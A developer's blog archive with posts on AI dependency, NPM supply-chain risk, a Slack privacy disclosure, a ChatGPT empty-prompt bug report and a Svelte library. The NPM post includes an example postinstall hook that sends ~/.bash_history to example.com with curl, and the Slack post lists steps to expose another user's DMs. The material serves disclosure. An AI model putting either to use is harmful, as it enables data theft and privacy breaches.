The Man With No Brains

 Published: Feb 5, 2026 · 900 words · 4 minutes reading time

I actually enjoy setting up a new coding project from scratch - those first couple of hours where you go from nothing to something, even if it’s just poorly laid out HTML and CSS, or a bunch of console.log statements.

Recently though, I’ve found myself unable to approach any new task without AI’s help.

Like an addiction, it became a trap. I couldn’t break free from the cycle of constant stimulation and instant gratification these tools provided. Instead of being a useful helper, AI became the process itself - I stopped starting with code and using AI to work through ideas, and instead started with AI and used it to generate the implementation.

How it started

When they first became available, AI coding agents felt novel and exciting - like a new tool in my toolbox that helped me realise ideas in completely new domains or languages, at a speed I wasn’t capable of before.

One example is Teskooano - my personal project to build a 3D space engine, something I’d wanted to do for years but never found time to realise. I discovered I could go from idea to working prototype in hours, achieving things that seemed beyond my reach. It became “just one more turn” - I’d see opportunities to add features, and instead of waiting for my slow meatbrain to implement them, they’d be done in minutes.

But now it’s a complex mess. Even today, I still haven’t actually learned how to write WebGL shaders or understood the inner workings of ThreeJS.

Yes, AI helped me build the project but it robbed me of the joy of learning, and the satisfaction of finally understanding how things work. In less than two years, I’ve become more dependent on AI than I could have imagined.

How it’s going

I now struggle, in my day-to-day work, to connect dots that were never a problem before. No one forced me to do this - I have no top-down executive orders mandating AI use. This situation is wholly of my own making.

But companies have spoken. Many of us now work in environments where we’re constantly expected to deliver new features while being told there’s no budget to grow teams (in fact, we have to cut engineers). AI creates a mirage of productivity - it feels like it’s helping us ship solutions faster.

Software development used to feel like pottery to me. You take a piece of clay and start shaping it into something - its final form truly unknowable. From that initial spark, the clay takes shape through the connection between human mind and hands, imagination being manifested into physical reality to create something that didn’t exist before. Maybe not novel in the sense that it’s a cup, plate, or vase - but no two pieces are ever the same, because no two people, or pieces of clay, are the same. This is especially true for abstract ideas. We call this art.

In this new age of AI agents, it feels like we’re heading somewhere dark. That spark of creation from the human mind is being replaced with a wholly mechanical process - one where every ‘piece of clay’ is the same, and every AI agent produces the same mechanical movements, with no connection to that mental space where truly novel ideas are born.

Code has moved from art to assembly line, from unique to mass-produced commodity - perhaps ironic considering my employer, whose entire business model is based on volume production.

What can be done?

We now exist in a weird liminal space - where software development is both easier than it’s ever been, and yet somehow harder to actually do.

I don’t believe the solution is to abandon using AI entirely - for some of us that ship has already sailed, and from experience there can be genuine value in these tools when used thoughtfully. Instead, I’m trying to recalibrate my relationship with them.

I’m learning to recognise the difference between productive use and dependency. I’ve decided that when I catch myself reaching for AI before I’ve even thought through the problem, I need to stop. Sometimes the slow, frustrating process of figuring things out yourself is exactly the point.

I’m going to force myself to write the first version of anything by hand - even if it’s messy, incomplete, or wrong. The AI can step in to help optimise, or explain concepts I don’t understand. But that initial act of creation, that struggle with the blank page, needs to stay human.

I’m also being more intentional about what I don’t offload. If I’m working in a domain I want to actually understand - like graphics programming - I want to make myself read the documentation, follow tutorials, and make mistakes - that’s the way we as humans truly learn and grow.

The craft of software development has always been about problem-solving and learning. AI should amplify those things, not replace them. We need to remember that reality is messy and at times inefficient and that the process of learning isn’t something to be optimised - it’s the point.

Oh no, not again... a meditation on NPM supply chain attacks

 Published: Sep 9, 2025 · 1700 words · 8 minutes reading time

I’ve been sitting on this article for a while now – I’ve put off publishing it for well over a year – but as we’ve seen this week, the time has come to lift the veil and say the quiet part out loud:

It’s 2025; Microsoft should be considered a “bad actor” and a threat to all companies who develop software.

Of course, if you’re old enough to remember – this is not the first time either…

Time is a flat circle

Here we are again – in 2025, Microsoft have fucked up so badly that they have likely created an even larger risk than they did in the 2000s with their browser, by simply doing absolutely nothing.

I had started initially writing this post around the time of the xz incident – a sophisticated and long-term attempt to gain control of a library used in many package managers of most Linux distributions.

Since then, many more incidents have happened, and NPM specifically has become the largest and easiest way to ship malware. At first, most of it was aimed at stealing cryptocurrency (because techbros seem to be obsessed with magic electric money and are easy prey). But now these supply chain attacks are starting to target more critical things, like the tokens and access keys of package maintainers – as seen with the NX incident, and now with several dependencies that are used daily by thousands of developers.

Again… this is nothing new in the land of NPM.

But it didn’t have to be this way…

We’ve come a long way, but have travelled nowhere

I have a long history with NodeJS – around 2010 I started working on a startup, and this was before npm was even a thing.

A screenshot of a slide announcing npm as a package manager for Node

Back in the misty days of the 1990s, most JavaScript security issues were not much of a backend concern: that was mostly the domain of Perl, PHP, Python, and Java.

The web however was a much different story.

In the very early days of the World Wide Web there was really only one main browser everyone used: Netscape Navigator. Released in 1994, it was not just a browser: throughout its life it had various incarnations of a built-in email client, calendar, and HTML editor with FTP browser, and with plugins could play media like RealPlayer streams and MP3s (which I remember at its launch), as well as Flash movies and games. It’s where JavaScript was born.

Many of the early websites of the day were static – popular tools to build websites included HotDog or Notepad. No fancy IDEs or frameworks, just a text editor, a browser, and alert() to debug.

Microsoft had also entered the game with Internet Explorer – included in an early Windows DLC called “Plus! For Windows 95”. It eventually became the software that Microsoft bet its whole company strategy around (much like today with AI).

Internet Explorer was embedded into every aspect of Windows – first in 1995 with Active Desktop, which continued all the way to Windows XP. With it you could embed a frame item on your Desktop, but also a Rich Text document or Excel spreadsheet. It was also bloated and buggy – and with that it presented two problems: a massive security risk and exposure to accusations of monopolising the browser market.

The law came after Microsoft hard, and in 2001 it won – Microsoft was told to break up its monopoly. One aspect was that it had to offer other browsers on its operating system (a similar story is happening now to Apple) – but it wasn’t forced to remove Internet Explorer.

Microsoft essentially abandoned IE; as the years rolled on they continued to push out new major versions to capture the market, but without fixing the major flaws. It still shipped as the default with the OS, unable to be removed without breaking other parts of the system.

Each release of Internet Explorer added something new to the browser landscape, but it also continued to pile bugs and flaws on top of the ones that no one touched – by default, on all Windows systems, lived code that could give hijackers access to users’ machines.

It wasn’t until 2015 that they finally abandoned the existing Internet Explorer codebase and shifted to a new engine, before eventually settling on their Chromium (Blink)-based engine. However, the ghost of IE still haunts us today.

The ticking time-bomb of postinstall

8 years ago, I wrote a small proof of concept. It was in response to this issue about npx – a small tool that had just been added to npm by default, whether you liked it or not.

With npx you could now run the following arbitrary command (PLEASE DO NOT RUN THIS SCRIPT):

npx https://gist.github.com/tanepiper/6cb9067adca626cd2c0edbc3786dad7b

This would now pull the gist as a node module and run it. In the proof-of-concept I put this command as a postinstall script. If you look at the gist, it’s a small binary script that posts your .bash_history to example.com – which at the time npx would just run.

My frustration at the time was aimed mostly towards npx itself – it seemed like the NPM team were adding a new easy-to-use attack vector by shipping a tool that could run any module from any source on the web, on your machine without user interaction. But little did I know at the time there was a deeper problem lurking with postinstall.
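To make the risk concrete: a postinstall hook is just an arbitrary shell command that npm runs automatically after a package is installed. A hypothetical malicious package, modelled on the gist above (the package name and collection URL here are purely illustrative), could look like this:

```json
{
  "name": "innocent-looking-package",
  "version": "1.0.0",
  "description": "A perfectly normal utility, honest",
  "scripts": {
    "postinstall": "curl -s -X POST --data-binary @$HOME/.bash_history https://example.com/collect"
  }
}
```

Nothing in a default `npm install` stops this hook from running – which is exactly the deeper problem lurking with postinstall.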

At the time I also created a package.json linter that would warn of potential issues. But of course it required projects to opt in, it needed trust, and I didn’t see a way forward for it.

This was, of course, before Microsoft, via GitHub, owned NPM.

A short bit of history

So how did NPM become the main package manager for Node? Back then, it solved a problem – it was as simple as that – and people noticed it and adopted it. Over time, more useful little libraries showed up and from that, the rest is history.

NPM, built on CouchDB which enabled fast replication, allowed a flourishing and open JavaScript ecosystem. In the beginning, it was a bit of a wild west, where people tended to cut corners or miss steps. There was also a lot of early abandonment of libraries, and communities started to form around some of the larger ones to at least establish them as de facto tools – Express.js for example has been around since before npm (and for all the complaints about performance aimed at it: it’s highly battle tested and the worst bugs have likely been squashed).

Node and npm’s future was not a guaranteed thing. At some point there was fragmentation of the ecosystem – tools such as yarn and pnpm exist because npm couldn’t or wouldn’t fix something, but they introduced their own changes that made them only partially compatible with each other. In 2014, for a short while, we even had a fork of NodeJS called io.js because of fundamental disagreements.

There was also the small problem that all of this infrastructure and services cost money to run.

To paraphrase C J Silverio – “There’s no money in package managers.”

In 2018 Microsoft bought GitHub (and until this year ran it as a side-concern with its own CEO and management team – just last month, the CEO stepped down and now GitHub is part of the “AI” team). In 2020, GitHub bought NPM – with pockets deep enough to run the infrastructure. This means that Microsoft owns the world’s largest repository of JavaScript code, the distribution channel for its packages – and the development ecosystem with VSCode.

This likely saved npm in the long run, simply because Microsoft had the resources to keep it running.

On the other hand, they have done little to make it a more secure tool, especially for enterprise customers. To their credit, GitHub has provided new tools for Software Bill of Materials attestation, which is a step in the right direction. But right now there are still no signed dependencies, and nothing stopping people using AI agents, or just plain old scripts, from creating thousands of junk or name-squatting packages.

… and as we’ve learned, 2-Factor Authentication isn’t enough to secure npm.


I want to get back to the fun of building software

Ultimately, I don’t think we can trust the software ecosystem provided by Microsoft anymore. It’s too fragile, brittle in the wrong places, and too open to abuse, and for most of my career I have seen the causes and effects first hand. This has made software development less fun, and more of a chore.

The tools we use to build software are not secure by default, and almost all of the time, the companies that provide them are not held to account for the security of their products.

Without a concerted effort across the industry to make the software supply chain secure by default, we will continue to see a rise in incidents – and the risks to data privacy and security will only increase. Criminal and state actors are always looking to exploit the vulnerabilities in our software, and the use of AI to create more sophisticated attacks will only make this worse. These don’t have to be technical either – deep fakes are close enough to be used as effective social engineering tools, and it’s very easy to fake emails that seem legitimate.

Unfortunately, Microsoft seem to be actively hostile – in their lack of attempts to shut down an active security hole that’s almost a decade old, they have left their customers at the highest levels of risk seen in computing.

For many companies, now is the right time to start looking at the tools they use to build software, and to start asking the hard questions about the security of their software supply chain – is it putting their customers, workers, or own profits at risk?

Slack wants you to know this privacy exploit is fine

 Published: Sep 25, 2023 · 900 words · 4 minutes reading time

Last week, after a call with the engineers on my team, I wanted to send a message to two of them at the same time - little did I know I’d find what I believe to be a nasty privacy exploit in Slack - one that made me ask “Why is this even a feature?”

Like any good responsible software engineer, instead of taking to social media or forums to post about the exploit, I opted to report it to HackerOne - where Slack accepts reports of potential security exploits - giving a detailed list of instructions on how to achieve it (Report #2171907).

Shortly after (within 40 minutes) I received a reply which slightly dumbfounded me - the full reply is below, but it began “We have reviewed your submission, and while this behavior is not perfectly ideal, it is intended.”

After asking some people in the infosec community what the right next step was, I was advised that I’m within my rights to disclose this, mostly to give fair warning to Slack users that this exploit exists.

Unforeseen Consequences

So what was this exploit I found? In some ways it’s so deliciously simple that I had to double-check it actually happened. I found it by using Slack “as intended” - but the result was not what I expected, with an unclear UI about the consequences - and I believe most users who experience it would not realise what has happened. In the moment, under certain circumstances, it could cause real harm.

The list of actions is as follows:

  1. Click on a user in Direct Messages
  2. Click on the user name at the top where the chevron is located
  3. Click "Add people to this conversation" (up to 9 people)
  4. Add one or more users to the conversation

You will now receive a popup with several options - in this case, because I couldn’t find the original DM with the pair of engineers in the UI, the option “Include conversation history?” seemed sensible.

In hindsight, there is a message at the top of the screen - but in the moment, as many know, messages not labelled as warnings can be missed or ignored by users - or deliberately abused by any bad actor with access to the appropriate Slack account.

So now a private DM conversation, going all the way back to the beginning of its history, has been shared with all the people added to it, attachments and all.

The other person in the DM thread was never asked to consent to this action.

But what now makes it worse is that this whole DM is now a thread, and a thread can be turned into a private channel.

Once turned into a private channel, the original person in the DM can be removed from the entire room - no longer having access to any of the messages. Also, as a channel, a much larger number of people (like a whole organisation) can be added to it.

OK, what now?

So the functionality is working as intended.

But what if I’m a disgruntled employee who has some DMs with a board member who was sharing internal confidential information? Or a bully who happens to find an unlocked computer of a fellow employee they know is in a secret relationship? Or a hacker who has managed to get into a key account of a Slack that hasn’t enabled 2FA, or via a magic link in their email account because of a weak password?

It’s not like unauthorised access to systems is unheard of.

Slack’s reply and caveats

To be fair to Slack, I will include their response below, where they give their reasons why this is “as intended”.

I’ll leave it up to you, the reader, to decide if it’s enough of a mitigation, or if many companies would even have the processes to deal with this as an immediate threat - I can guess many companies using Slack don’t even have a dedicated CSO or a team managing Slack, and likely use the default settings.

Thank you for your report.

We have reviewed your submission, and while this behavior is not perfectly ideal, it is intended. In this “attack”, a user must have the permission to create private Channels, and this can be restricted by Owners/Admins.

In addition, the DM messages are not truly deleted when performing this behavior. An Admin/Owner with the necessary permissions to manage private Channels can always access the content within private Channels if necessary.

For these reasons, we are relatively satisfied with our security at this time, and we will be closing this report as Informative. Regardless, we appreciate your efforts here, and hope you continue to submit to our program.

Thanks, and good luck with your future bug hunting.

I Think I Found a Privacy Exploit in ChatGPT

 Published: Apr 14, 2023 · 1200 words · 6 minutes reading time

> tl;dr: I discovered that passing empty prompts to ChatGPT still generates responses. Initially, I thought these might be hallucinations, but now I suspect they could also include other users' responses from the API.

Last month, OpenAI unveiled their advanced large language model, GPT-4, attracting attention from developers, enterprises, media, and governments alike.

Before receiving my GPT-4 invite, I experimented with alpaca.cpp, designed to run models on CPUs with limited memory. I began by developing a simple web interface using NodeJS and sockets for parsing the command line output. Once I started working with the GPT-4 API, I quickly realized that with the right prompts it could be a powerful tool. It has already helped me rewrite complex code into simpler methods and reduce complexity by moving code into functions:

Screenshot of ChatGPT suggesting a code improvement for creating tables by proposing a cell creation method

However, I noticed something peculiar — due to a bug in my code, I was sending empty prompts to the ChatGPT endpoint, but I still received seemingly random responses, ranging from standard AI model introductions to information about people, places, and concepts. Inspired by the coinciding #StochasticParrotsDay online conference, I transformed this into a Mastodon Bot (now moved to botsin.space).

After running the bot for a month, I concluded that a significant portion of the responses without prompts might be responses for other users, potentially due to a bug that sends unintended responses when given an unsanitized empty prompt.

These could be stochastic hallucinations, random training data pulled out by entropy, or leaked responses — or a mix of all three possibilities.

If this is the case, then ChatGPT would not be much better than a Markov Chain , and the entire large language model/AI market has been playing us for fools.

However, if I am correct, then the current OpenAI APIs could potentially be made to leak private or sensitive data, simply by not sanitising their inputs…

The bot will continue to run until at least the end of this month, and all the content will be archived at stochasticparrot.lol.

Summary of what it could be?

I have three pet theories about what’s happening here. I’ve submitted this to OpenAI’s Disclosure and Bug Bounty programs:

  • These are impressive hallucinations, possibly sparks of AGI - but sometimes they become nonsensical, or the output is concerning, especially around personal medical questions.
  • ChatGPT randomly accesses its corpus and regurgitates data in some form. It really loves generating lists.
  • There is a bug, potentially a serious one. If the empty prompt issue is more thoroughly investigated, it might confirm that passing no prompt returns cached or previous responses.

It would be interesting if all three theories were true…

Update: Bug Bounty Response

I’ve since had a reply on Bugcrowd. It was first closed as Not Applicable with a response about the model; I re-iterated that it was about the API. A further response now confirms (from their perspective) that this is indeed hallucinations:

Hi tanepiper,

Thank you for your submission to the OpenAI program and your patience on this submission. We appreciate your efforts in keeping our platform secure.

It looks like what you’re experiencing here is what happens when you send a request to the model without any query at all. You can try it out yourself in the API like this:

curl 'https://api.openai.com/v1/chat/completions' \
  -H 'authorization: Bearer <yourtoken>' \
  -H 'content-type: application/json' \
  --data-raw '{"messages":[{"role":"system","content":""}],"temperature":0.7,"max_tokens":256,"top_p":1,"frequency_penalty":0,"presence_penalty":0,"model":"gpt-3.5-turbo","stream":true}' 

What’s happening there is that it’s starting by picking a token completely at random, and then another one, and so on until the previous tokens start to influence what comes afterward and it starts to “make sense”, even if it’s just a completely random hallucination from the model. It’s a really fascinating and weird way these models work. However, there’s no security impact here. As such, I do believe the current state of the submission is accurate.

All the best in your future bug hunting!

Best regards, - wilson_bugcrowd

So for now, case closed…


Setting up the Bot Infrastructure

To get the bot up and running, I wanted it to be free and easy to manage. In the end I opted to use GitHub Actions with scheduled tasks - this allowed me to set up a script that ran hourly, calling the ChatGPT API with an empty prompt and turning the response into a toot. I also found that passing only a space character to the Dall-E API produced images.
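The hourly job’s API call can be sketched roughly like this (a minimal sketch assuming Node 18+ with global fetch; the function names are mine, not the bot’s actual code). The request body has the same shape as the curl example in the Bugcrowd reply above - a single system message whose content is an empty string:

```javascript
// Build the request body for an "empty prompt" completion - one system
// message with empty content, mirroring the curl example in the Bugcrowd reply.
function buildEmptyPromptRequest(model = "gpt-3.5-turbo") {
  return {
    model,
    messages: [{ role: "system", content: "" }],
    temperature: 0.7,
    max_tokens: 256,
  };
}

// Call the Chat Completions endpoint and return whatever text comes back -
// hallucination or otherwise, this becomes the toot text.
async function fetchEmptyPromptCompletion(apiKey) {
  const res = await fetch("https://api.openai.com/v1/chat/completions", {
    method: "POST",
    headers: {
      authorization: `Bearer ${apiKey}`,
      "content-type": "application/json",
    },
    body: JSON.stringify(buildEmptyPromptRequest()),
  });
  if (!res.ok) throw new Error(`OpenAI request failed: ${res.status}`);
  const data = await res.json();
  return data.choices?.[0]?.message?.content ?? "";
}
```

A scheduled workflow then just runs this script on a cron trigger and pipes the result to the Mastodon posting step.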

With both scripts, after getting a response from OpenAI I use it to generate one or more toots - depending on the length, as a set of replies. For images, I first download them and then upload them to Mastodon as attachments.
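Splitting a long response into a chain of replies can be sketched like this (a helper of my own for illustration, not the bot’s actual code; Mastodon’s default status limit is 500 characters):

```javascript
// Split text into toot-sized chunks on word boundaries, so each chunk
// can be posted as a reply to the previous one.
function splitIntoToots(text, limit = 500) {
  const toots = [];
  let current = "";
  for (const word of text.split(/\s+/).filter(Boolean)) {
    const candidate = current ? `${current} ${word}` : word;
    if (candidate.length > limit && current) {
      toots.push(current); // current chunk is full - start a new one
      current = word;
    } else {
      current = candidate;
    }
  }
  if (current) toots.push(current);
  return toots;
}
```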

Some of the more recent toots are below - ones with a parrot emoji (🦜) were created without a prompt, while a speech bubble (💬) indicates a prompt was used.

Once I had this up and running, I then created a small AstroJS website that outputs each entry as a posting.

Making Polly Speak

Up to this point I had just been working with text and images - but I had recently seen ElevenLabs in some tech news, and learned they had a text-to-speech API. After some initial issues (which used up all of the free credit), I eventually set up another action that took the OpenAI response and passed it to the ElevenLabs API - this provided an MP3 stream of the speech, which I save locally and then upload to Mastodon as a toot attachment.
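The text-to-speech step can be sketched like this (the endpoint shape and header name are my assumptions from ElevenLabs’ public API at the time; the voice ID, key, and function names are illustrative, and the bot’s real code may differ):

```javascript
// Build the request for ElevenLabs text-to-speech (assumed endpoint shape).
function buildTtsRequest(text, voiceId, apiKey) {
  return {
    url: `https://api.elevenlabs.io/v1/text-to-speech/${voiceId}`,
    options: {
      method: "POST",
      headers: { "xi-api-key": apiKey, "content-type": "application/json" },
      body: JSON.stringify({ text }),
    },
  };
}

// Fetch the MP3 stream and save it locally, ready to upload to Mastodon.
async function speechToFile(text, voiceId, apiKey, outPath) {
  const { writeFile } = await import("node:fs/promises");
  const { url, options } = buildTtsRequest(text, voiceId, apiKey);
  const res = await fetch(url, options);
  if (!res.ok) throw new Error(`TTS request failed: ${res.status}`);
  await writeFile(outPath, Buffer.from(await res.arrayBuffer()));
}
```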

I also decided to see if I could get it to generate some polls. With some gentle prompting I was able to get it to produce JSON output which could be used in polls. Sadly, most of the time it seems to repeat the same questions over and over with slightly different wording, only occasionally coming up with something original.

I even went as far as trying to generate video content - not through Stable Diffusion, but by generating text themes to use with the Creatomate API - allowing me to generate social media “fact” videos. Unfortunately this was a bit buggy, and due to the way Mastodon works it can time out quite a bit.

A fun experiment

Overall, writing this bot was a fun experiment - but I probably learned more about writing better pipelines than I did about AI and LLMs. What did surprise me was how often the responses seemed to be answers to questions that were not asked - where are these responses being generated? Are we seeing the flicker of AGI? Or just the stochastic ramblings of a machine run by some sketchy people?

Announcing Formula - A Zero-Config Reactive Forms Library for Svelte

 Published: Feb 13, 2021 · 300 words · 2 minutes reading time

Today I’m happy to announce the release of Svelte Formula - a new forms library for Svelte.

The Svelte Formula Logo is some science beakers and a molecule

Formula is a zero-config library - meaning you do not have to pass any settings to the library itself to handle form validation and submission. It uses the validation properties of HTML5 forms directly, so you can create progressive, accessible forms first.

The library works with Svelte’s use directive and can be bound to any element, not just <form> elements; it automatically handles subscribing and unsubscribing to any form element with a name attribute.

Here is the example from the demo:


<script>
  import {onDestroy} from 'svelte';
  import {formula} from 'svelte-formula'

  const {form, formValues, validity, touched, formValid} = formula();

  const sub = formValues.subscribe(v => console.log(v));

  onDestroy(() => {
    sub();
  })
</script>

<form use:form>
  <div class='form-field'>
    <label for='username'>Username</label>
    <input type='text' id='username' name='username' required minlength="8" class:error={$touched?.username && $validity?.username?.invalid}/>
    <div hidden={$validity?.username?.valid}>{$validity?.username?.message}</div>
  </div>
  <div class='form-field'>
    <label for='password'>Password</label>
    <input type='password' id='password' name='password' required minlength="8" class:error={$touched?.password && $validity?.password?.invalid}/>
    <div hidden={$validity?.password?.valid}>{$validity?.password?.message}</div>
  </div>

  <button disabled={!$formValid}>Save</button>
</form>

<style>
  .form-field {
    margin-bottom: 10px;
    border-bottom: 1px solid lightgrey;
  }

  .error {
    border: 1px solid red;
  }
</style>

In this example the only validations are required and minlength, applied directly to the HTML element itself. Errors and error states are displayed via the validity object, and the touched object lets us apply error styling only once the form element has first been focused.

The release is considered an alpha version - the API may change and there are still tests and documentation to write - but you can try it out right now in your own project with npm install svelte-formula - any bugs, issues or suggestions, please feel free to leave them here.